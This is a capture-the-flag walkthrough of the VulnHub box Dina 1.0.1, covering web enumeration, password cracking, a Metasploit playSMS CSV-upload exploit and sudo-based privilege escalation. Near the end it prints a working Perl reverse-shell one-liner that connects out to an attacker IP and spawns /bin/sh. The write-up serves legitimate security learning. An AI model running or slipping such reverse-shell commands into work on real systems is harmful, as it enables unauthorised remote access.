Dina 1.0.1 Walkthrough
Dina is a fun easy vulnerable machine, it can be found at VulnHub. In total I quite enjoyed this box and would definitely recommend it to anyone who is learning, as I am.
Initial Recon
As I mentioned in a previous guide I typically use arp-scan
to find the machine. Starting off I run nmap
on the target, nothing interesting comes up except an Apache server running on port 80. Taking a look on Firefox we find the site that is running.
Looking in the source code of the html page we find that the “Submit Query” button sends a post request to /ange1
, however it seems that the actual method attribute on the form is misspelled.
I go ahead and do a curl
POST request with an empty body to /ange1
and only get the contents of an empty webpage directory.
Oh well seems to be a dead-end. My next standard step is go ahead and throw dirb
at it with a few wordlists. Using the directory-list-2.3-small.txt
found in the dirbuster
wordlist directory we get a few interesting results back.
Taking a look into /uploads
, and /tmp
we find that there is nothing but empty directories. However going into /secure
we find an interesting file we can download called backup.zip
.
I download it and we will return to it later. Then I take a look into /nothing
and get greeted with a cheeky webpage. However checking out /nothing/pass
we get some potential passwords!
Local Work
Attempting to unzip
backup.zip
ends up failing. Appears that the archive is password encrypted. I use 7z e backup.zip
we get a password prompt. Using the previously found password list from /nothing/pass
we will attempt to crack it. On first try looks like the password “freedom” did the trick.
Trying to open the .mp3
file we find out that something very wrong with the file. I cat
out the file and it looks to be a text file rename to .mp3
.
This file now reveals to us a new URL to investigate and a potential user/pass login for something.
Getting a Shell
Heading over to /SecreTSMSgatwayLogin
we seem to find a playSMS service running.
The backup-cred.mp3
file seems to indicate the password is 6 characters long, but before we try to crazy brute-forcing let us try some of those other passwords I found earlier. Trying them out sequentially we quickly find “diana” logs me in.
I trudge around here for a while, noting that I could potentially inject html into the source code (XSS?), but nothing seems to work. Then I decide to take a peek at MetaSploit and see if there is any vulnerabilities associated with playSMS.
Looks like we got some hits. During my poking around earlier I noted there was some ability to upload CSVs, so let us try the upload CSV attack.
Ran the exploit and we get greeted with a shell.
Side note: This is a meterpreter
shell. Do get into a normal shell I used the following sequence of commands.
meterpreter > shell
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Dina:/var/www$ export TERM=xterm
Privilege Escalation
I at first thought maybe the older kernel version would be vulnerable. But nothing really worked. Afterwards I followed a checklist and said to run sudo -l
and see if there is anything you can run without the password.
Interesting I can run Perl scripts as sudo
without a password. Doing some investigation online I find the following Perl script for a reverse shell.
perl -e 'use Socket;$i="192.168.1.167";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Changing the IP and port in the above script. I set up Netcat in my local terminal and ran the script on the user shell, and we get root
!